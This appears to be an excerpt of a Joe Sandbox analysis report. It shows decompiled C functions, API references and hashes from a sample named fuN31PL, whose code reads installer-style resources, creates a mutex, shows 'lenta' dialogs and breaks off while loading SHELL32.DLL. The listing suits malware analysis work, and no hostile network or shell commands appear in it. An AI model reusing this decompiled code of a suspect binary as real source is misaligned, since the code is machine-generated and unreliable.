                                                                                                                                                                                                                                              • Opcode ID: 6f1e707b1d66fc8edb1370c11202f6f676bda07b5d676c69775f01709fbe6ad6
                                                                                                                                                                                                                                              • Instruction ID: 082b14d86c2bafe5f8bfd9ad8290dc12797105e8360f112888d4e43fde9e126a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f1e707b1d66fc8edb1370c11202f6f676bda07b5d676c69775f01709fbe6ad6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3351797C3842407BEB225B355C8DF7B2E5DEF9BB54F504029F226D65C1CBA48E82D261
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                                                                              			E001A2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t13;
                                                                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                                                                              				void* _t23;
                                                                                                                                                                                                                                              				void* _t27;
                                                                                                                                                                                                                                              				struct HRSRC__* _t31;
                                                                                                                                                                                                                                              				intOrPtr _t33;
                                                                                                                                                                                                                                              				void* _t43;
                                                                                                                                                                                                                                              				void* _t48;
                                                                                                                                                                                                                                              				signed int _t65;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                              				signed int _t67;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t13 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                                                              				_t65 = 0;
                                                                                                                                                                                                                                              				_t66 = __ecx;
                                                                                                                                                                                                                                              				_t48 = __edx;
                                                                                                                                                                                                                                              				 *0x1a9a3c = __ecx;
                                                                                                                                                                                                                                              				memset(0x1a9140, 0, 0x8fc);
                                                                                                                                                                                                                                              				memset(0x1a8a20, 0, 0x32c);
                                                                                                                                                                                                                                              				memset(0x1a88c0, 0, 0x104);
                                                                                                                                                                                                                                              				 *0x1a93ec = 1;
                                                                                                                                                                                                                                              				_t20 = E001A468F("TITLE", 0x1a9154, 0x7f);
                                                                                                                                                                                                                                              				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                                                              					_t64 = 0x4b1;
                                                                                                                                                                                                                                              					goto L32;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                                                              					 *0x1a858c = _t27;
                                                                                                                                                                                                                                              					SetEvent(_t27);
                                                                                                                                                                                                                                              					_t64 = 0x1a9a34;
                                                                                                                                                                                                                                              					if(E001A468F("EXTRACTOPT", 0x1a9a34, 4) != 0) {
                                                                                                                                                                                                                                              						if(( *0x1a9a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                              							L12:
                                                                                                                                                                                                                                              							 *0x1a9120 =  *0x1a9120 & _t65;
                                                                                                                                                                                                                                              							if(E001A5C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                                                              								if( *0x1a8a3a == 0) {
                                                                                                                                                                                                                                              									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                                                              									if(_t31 != 0) {
                                                                                                                                                                                                                                              										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									if( *0x1a8184 != 0) {
                                                                                                                                                                                                                                              										__imp__#17();
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									if( *0x1a8a24 == 0) {
                                                                                                                                                                                                                                              										_t57 = _t65;
                                                                                                                                                                                                                                              										if(E001A36EE(_t65) == 0) {
                                                                                                                                                                                                                                              											goto L33;
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											_t33 =  *0x1a9a40; // 0x3
                                                                                                                                                                                                                                              											_t48 = 1;
                                                                                                                                                                                                                                              											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                                                              												if(( *0x1a9a34 & 0x00000100) == 0 || ( *0x1a8a38 & 0x00000001) != 0 || E001A18A3(_t64, _t66) != 0) {
                                                                                                                                                                                                                                              													goto L30;
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													_t64 = 0x7d6;
                                                                                                                                                                                                                                              													if(E001A6517(_t57, 0x7d6, _t34, E001A19E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                                                              														goto L33;
                                                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                                                              														goto L30;
                                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												L30:
                                                                                                                                                                                                                                              												_t23 = _t48;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										_t23 = 1;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									E001A2390(0x1a8a3a);
                                                                                                                                                                                                                                              									goto L33;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t64 = 0x520;
                                                                                                                                                                                                                                              								L32:
                                                                                                                                                                                                                                              								E001A44B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              								goto L33;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t64 =  &_v268;
                                                                                                                                                                                                                                              							if(E001A468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                              								goto L3;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                                                              								 *0x1a8588 = _t43;
                                                                                                                                                                                                                                              								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                                                              									goto L12;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									if(( *0x1a9a34 & 0x00000080) == 0) {
                                                                                                                                                                                                                                              										_t64 = 0x524;
                                                                                                                                                                                                                                              										if(E001A44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                                                              											goto L12;
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											goto L11;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										_t64 = 0x54b;
                                                                                                                                                                                                                                              										E001A44B9(0, 0x54b, "lenta", 0, 0x10, 0);
                                                                                                                                                                                                                                              										L11:
                                                                                                                                                                                                                                              										CloseHandle( *0x1a8588);
                                                                                                                                                                                                                                              										 *0x1a9124 = 0x800700b7;
                                                                                                                                                                                                                                              										goto L33;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						L3:
                                                                                                                                                                                                                                              						_t64 = 0x4b1;
                                                                                                                                                                                                                                              						E001A44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              						 *0x1a9124 = 0x80070714;
                                                                                                                                                                                                                                              						L33:
                                                                                                                                                                                                                                              						_t23 = 0;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E001A6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                                                              			}



















                                                                                                                                                                                                                                              0x001a2cb5
                                                                                                                                                                                                                                              0x001a2cbc
                                                                                                                                                                                                                                              0x001a2cc7
                                                                                                                                                                                                                                              0x001a2cc9
                                                                                                                                                                                                                                              0x001a2cd1
                                                                                                                                                                                                                                              0x001a2cd3
                                                                                                                                                                                                                                              0x001a2cd9
                                                                                                                                                                                                                                              0x001a2ce9
                                                                                                                                                                                                                                              0x001a2cf9
                                                                                                                                                                                                                                              0x001a2d0e
                                                                                                                                                                                                                                              0x001a2d15
                                                                                                                                                                                                                                              0x001a2d1c
                                                                                                                                                                                                                                              0x001a2ef3
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2d2d
                                                                                                                                                                                                                                              0x001a2d34
                                                                                                                                                                                                                                              0x001a2d3b
                                                                                                                                                                                                                                              0x001a2d40
                                                                                                                                                                                                                                              0x001a2d48
                                                                                                                                                                                                                                              0x001a2d59
                                                                                                                                                                                                                                              0x001a2d84
                                                                                                                                                                                                                                              0x001a2e1f
                                                                                                                                                                                                                                              0x001a2e1f
                                                                                                                                                                                                                                              0x001a2e2e
                                                                                                                                                                                                                                              0x001a2e41
                                                                                                                                                                                                                                              0x001a2e5a
                                                                                                                                                                                                                                              0x001a2e62
                                                                                                                                                                                                                                              0x001a2e6c
                                                                                                                                                                                                                                              0x001a2e6c
                                                                                                                                                                                                                                              0x001a2e75
                                                                                                                                                                                                                                              0x001a2e77
                                                                                                                                                                                                                                              0x001a2e77
                                                                                                                                                                                                                                              0x001a2e84
                                                                                                                                                                                                                                              0x001a2e8b
                                                                                                                                                                                                                                              0x001a2e94
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2e96
                                                                                                                                                                                                                                              0x001a2e96
                                                                                                                                                                                                                                              0x001a2e9e
                                                                                                                                                                                                                                              0x001a2ea2
                                                                                                                                                                                                                                              0x001a2eba
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2ece
                                                                                                                                                                                                                                              0x001a2ede
                                                                                                                                                                                                                                              0x001a2eed
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2eed
                                                                                                                                                                                                                                              0x001a2eef
                                                                                                                                                                                                                                              0x001a2eef
                                                                                                                                                                                                                                              0x001a2eef
                                                                                                                                                                                                                                              0x001a2eef
                                                                                                                                                                                                                                              0x001a2ea2
                                                                                                                                                                                                                                              0x001a2e86
                                                                                                                                                                                                                                              0x001a2e88
                                                                                                                                                                                                                                              0x001a2e88
                                                                                                                                                                                                                                              0x001a2e43
                                                                                                                                                                                                                                              0x001a2e48
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2e48
                                                                                                                                                                                                                                              0x001a2e30
                                                                                                                                                                                                                                              0x001a2e30
                                                                                                                                                                                                                                              0x001a2ef8
                                                                                                                                                                                                                                              0x001a2f01
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2f01
                                                                                                                                                                                                                                              0x001a2d8a
                                                                                                                                                                                                                                              0x001a2d8f
                                                                                                                                                                                                                                              0x001a2da1
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2da3
                                                                                                                                                                                                                                              0x001a2dae
                                                                                                                                                                                                                                              0x001a2db4
                                                                                                                                                                                                                                              0x001a2dbb
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2dca
                                                                                                                                                                                                                                              0x001a2dd3
                                                                                                                                                                                                                                              0x001a2df5
                                                                                                                                                                                                                                              0x001a2e02
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2dd5
                                                                                                                                                                                                                                              0x001a2dde
                                                                                                                                                                                                                                              0x001a2de3
                                                                                                                                                                                                                                              0x001a2e04
                                                                                                                                                                                                                                              0x001a2e0a
                                                                                                                                                                                                                                              0x001a2e10
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2e10
                                                                                                                                                                                                                                              0x001a2dd3
                                                                                                                                                                                                                                              0x001a2dbb
                                                                                                                                                                                                                                              0x001a2da1
                                                                                                                                                                                                                                              0x001a2d5b
                                                                                                                                                                                                                                              0x001a2d5b
                                                                                                                                                                                                                                              0x001a2d5d
                                                                                                                                                                                                                                              0x001a2d69
                                                                                                                                                                                                                                              0x001a2d6e
                                                                                                                                                                                                                                              0x001a2f06
                                                                                                                                                                                                                                              0x001a2f06
                                                                                                                                                                                                                                              0x001a2f06
                                                                                                                                                                                                                                              0x001a2d59
                                                                                                                                                                                                                                              0x001a2f18

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 001A2CD9
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 001A2CE9
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 001A2CF9
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001A46A0
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: SizeofResource.KERNEL32(00000000,00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46A9
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001A46C3
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: LoadResource.KERNEL32(00000000,00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46CC
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: LockResource.KERNEL32(00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46D3
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: memcpy_s.MSVCRT ref: 001A46E5
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46EF
                                                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A2D34
                                                                                                                                                                                                                                              • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 001A2D40
                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 001A2DAE
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 001A2DBD
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 001A2E0A
                                                                                                                                                                                                                                                • Part of subcall function 001A44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001A4518
                                                                                                                                                                                                                                                • Part of subcall function 001A44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 001A4554
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                                                              • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
                                                                                                                                                                                                                                              • API String ID: 1002816675-2993962200
                                                                                                                                                                                                                                              • Opcode ID: dc2cd8894d74ff0bc6032dd80cb8a25895f418835d65dc97279982be9f9ceab0
                                                                                                                                                                                                                                              • Instruction ID: cfff6adc6a482d73a10e1518ef3d120c2c765bd65080257c972417674824228d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc2cd8894d74ff0bc6032dd80cb8a25895f418835d65dc97279982be9f9ceab0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 325107BC744301ABE725AB3C9D4AB7B3699EB97710F14403AF941D69D1EBB88CC1C621
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 81%
                                                                                                                                                                                                                                              			E001A34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                              				void* _t9;
                                                                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                                                                              				void* _t13;
                                                                                                                                                                                                                                              				void* _t17;
                                                                                                                                                                                                                                              				void* _t23;
                                                                                                                                                                                                                                              				void* _t25;
                                                                                                                                                                                                                                              				struct HWND__* _t35;
                                                                                                                                                                                                                                              				struct HWND__* _t38;
                                                                                                                                                                                                                                              				void* _t39;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t9 = _a8 - 0x10;
                                                                                                                                                                                                                                              				if(_t9 == 0) {
                                                                                                                                                                                                                                              					__eflags = 1;
                                                                                                                                                                                                                                              					L19:
                                                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                                                              					 *0x1a91d8 = 1;
                                                                                                                                                                                                                                              					L20:
                                                                                                                                                                                                                                              					_push(_a4);
                                                                                                                                                                                                                                              					L21:
                                                                                                                                                                                                                                              					EndDialog();
                                                                                                                                                                                                                                              					L22:
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_push(1);
                                                                                                                                                                                                                                              				_pop(1);
                                                                                                                                                                                                                                              				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                                                              				if(_t12 == 0) {
                                                                                                                                                                                                                                              					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                                                              					if(_a12 != 0x1b) {
                                                                                                                                                                                                                                              						goto L22;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L19;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t13 = _t12 - 0xe;
                                                                                                                                                                                                                                              				if(_t13 == 0) {
                                                                                                                                                                                                                                              					_t35 = _a4;
                                                                                                                                                                                                                                              					 *0x1a8584 = _t35;
                                                                                                                                                                                                                                              					E001A43D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                                                              					__eflags =  *0x1a8184; // 0x1
                                                                                                                                                                                                                                              					if(__eflags != 0) {
                                                                                                                                                                                                                                              						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                                                              						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					SetWindowTextA(_t35, "lenta");
                                                                                                                                                                                                                                              					_t17 = CreateThread(0, 0, E001A4FE0, 0, 0, 0x1a8798);
                                                                                                                                                                                                                                              					 *0x1a879c = _t17;
                                                                                                                                                                                                                                              					__eflags = _t17;
                                                                                                                                                                                                                                              					if(_t17 != 0) {
                                                                                                                                                                                                                                              						goto L22;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						E001A44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                                                                              						_push(_t35);
                                                                                                                                                                                                                                              						goto L21;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t23 = _t13 - 1;
                                                                                                                                                                                                                                              				if(_t23 == 0) {
                                                                                                                                                                                                                                              					__eflags = _a12 - 2;
                                                                                                                                                                                                                                              					if(_a12 != 2) {
                                                                                                                                                                                                                                              						goto L22;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					ResetEvent( *0x1a858c);
                                                                                                                                                                                                                                              					_t38 =  *0x1a8584; // 0x0
                                                                                                                                                                                                                                              					_t25 = E001A44B9(_t38, 0x4b2, 0x1a1140, 0, 0x20, 4);
                                                                                                                                                                                                                                              					__eflags = _t25 - 6;
                                                                                                                                                                                                                                              					if(_t25 == 6) {
                                                                                                                                                                                                                                              						L11:
                                                                                                                                                                                                                                              						 *0x1a91d8 = 1;
                                                                                                                                                                                                                                              						SetEvent( *0x1a858c);
                                                                                                                                                                                                                                              						_t39 =  *0x1a879c; // 0x0
                                                                                                                                                                                                                                              						E001A3680(_t39);
                                                                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                                                                              						goto L20;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					__eflags = _t25 - 1;
                                                                                                                                                                                                                                              					if(_t25 == 1) {
                                                                                                                                                                                                                                              						goto L11;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					SetEvent( *0x1a858c);
                                                                                                                                                                                                                                              					goto L22;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_t23 == 0xe90) {
                                                                                                                                                                                                                                              					TerminateThread( *0x1a879c, 0);
                                                                                                                                                                                                                                              					EndDialog(_a4, _a12);
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                                                              			}












                                                                                                                                                                                                                                              0x001a34fb
                                                                                                                                                                                                                                              0x001a34fe
                                                                                                                                                                                                                                              0x001a3665
                                                                                                                                                                                                                                              0x001a3666
                                                                                                                                                                                                                                              0x001a3666
                                                                                                                                                                                                                                              0x001a3668
                                                                                                                                                                                                                                              0x001a366e
                                                                                                                                                                                                                                              0x001a366e
                                                                                                                                                                                                                                              0x001a3671
                                                                                                                                                                                                                                              0x001a3671
                                                                                                                                                                                                                                              0x001a3677
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3677
                                                                                                                                                                                                                                              0x001a3504
                                                                                                                                                                                                                                              0x001a3506
                                                                                                                                                                                                                                              0x001a3507
                                                                                                                                                                                                                                              0x001a350c
                                                                                                                                                                                                                                              0x001a365b
                                                                                                                                                                                                                                              0x001a365f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3661
                                                                                                                                                                                                                                              0x001a3512
                                                                                                                                                                                                                                              0x001a3515
                                                                                                                                                                                                                                              0x001a35be
                                                                                                                                                                                                                                              0x001a35c1
                                                                                                                                                                                                                                              0x001a35d1
                                                                                                                                                                                                                                              0x001a35d8
                                                                                                                                                                                                                                              0x001a35de
                                                                                                                                                                                                                                              0x001a35f8
                                                                                                                                                                                                                                              0x001a3617
                                                                                                                                                                                                                                              0x001a3617
                                                                                                                                                                                                                                              0x001a3623
                                                                                                                                                                                                                                              0x001a3637
                                                                                                                                                                                                                                              0x001a363d
                                                                                                                                                                                                                                              0x001a3642
                                                                                                                                                                                                                                              0x001a3644
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3646
                                                                                                                                                                                                                                              0x001a3652
                                                                                                                                                                                                                                              0x001a3657
                                                                                                                                                                                                                                              0x001a3658
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3658
                                                                                                                                                                                                                                              0x001a3644
                                                                                                                                                                                                                                              0x001a351b
                                                                                                                                                                                                                                              0x001a351d
                                                                                                                                                                                                                                              0x001a354f
                                                                                                                                                                                                                                              0x001a3553
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a355f
                                                                                                                                                                                                                                              0x001a3565
                                                                                                                                                                                                                                              0x001a357c
                                                                                                                                                                                                                                              0x001a3581
                                                                                                                                                                                                                                              0x001a3584
                                                                                                                                                                                                                                              0x001a359b
                                                                                                                                                                                                                                              0x001a35a1
                                                                                                                                                                                                                                              0x001a35a7
                                                                                                                                                                                                                                              0x001a35ad
                                                                                                                                                                                                                                              0x001a35b3
                                                                                                                                                                                                                                              0x001a35b8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a35b8
                                                                                                                                                                                                                                              0x001a3586
                                                                                                                                                                                                                                              0x001a3588
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3590
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3590
                                                                                                                                                                                                                                              0x001a3524
                                                                                                                                                                                                                                              0x001a3535
                                                                                                                                                                                                                                              0x001a3541
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3549
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • TerminateThread.KERNEL32(00000000), ref: 001A3535
                                                                                                                                                                                                                                              • EndDialog.USER32(?,?), ref: 001A3541
                                                                                                                                                                                                                                              • ResetEvent.KERNEL32 ref: 001A355F
                                                                                                                                                                                                                                              • SetEvent.KERNEL32(001A1140,00000000,00000020,00000004), ref: 001A3590
                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 001A35C7
                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,0000083B), ref: 001A35F1
                                                                                                                                                                                                                                              • SendMessageA.USER32(00000000), ref: 001A35F8
                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,0000083B), ref: 001A3610
                                                                                                                                                                                                                                              • SendMessageA.USER32(00000000), ref: 001A3617
                                                                                                                                                                                                                                              • SetWindowTextA.USER32(?,lenta), ref: 001A3623
                                                                                                                                                                                                                                              • CreateThread.KERNEL32 ref: 001A3637
                                                                                                                                                                                                                                              • EndDialog.USER32(?,00000000), ref: 001A3671
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                                                              • String ID: lenta
                                                                                                                                                                                                                                              • API String ID: 2406144884-2780258678
                                                                                                                                                                                                                                              • Opcode ID: a9b518e1566c04becb496b705b4a72a58ad3b68166851cc9bfd5753256ae0800
                                                                                                                                                                                                                                              • Instruction ID: 079381798b9f378346e4efc11e76ab526377cec093a622dc481752d0759cf812
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a9b518e1566c04becb496b705b4a72a58ad3b68166851cc9bfd5753256ae0800
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD310479240300BBD7611F39EC0DF6B3B69EB87B10F50452AF62695AA0CB718A80DB51
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                                                                                                              			E001A4224(char __ecx) {
                                                                                                                                                                                                                                              				char* _v8;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                              				char* _v28;
                                                                                                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                                                                                                              				intOrPtr _v36;
                                                                                                                                                                                                                                              				intOrPtr _v40;
                                                                                                                                                                                                                                              				char _v44;
                                                                                                                                                                                                                                              				char _v48;
                                                                                                                                                                                                                                              				char _v52;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                                                              				char _t42;
                                                                                                                                                                                                                                              				char* _t44;
                                                                                                                                                                                                                                              				char* _t61;
                                                                                                                                                                                                                                              				void* _t63;
                                                                                                                                                                                                                                              				char* _t65;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                              				char _t67;
                                                                                                                                                                                                                                              				void* _t71;
                                                                                                                                                                                                                                              				char _t76;
                                                                                                                                                                                                                                              				intOrPtr _t85;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t67 = __ecx;
                                                                                                                                                                                                                                              				_t66 = LoadLibraryA("SHELL32.DLL");
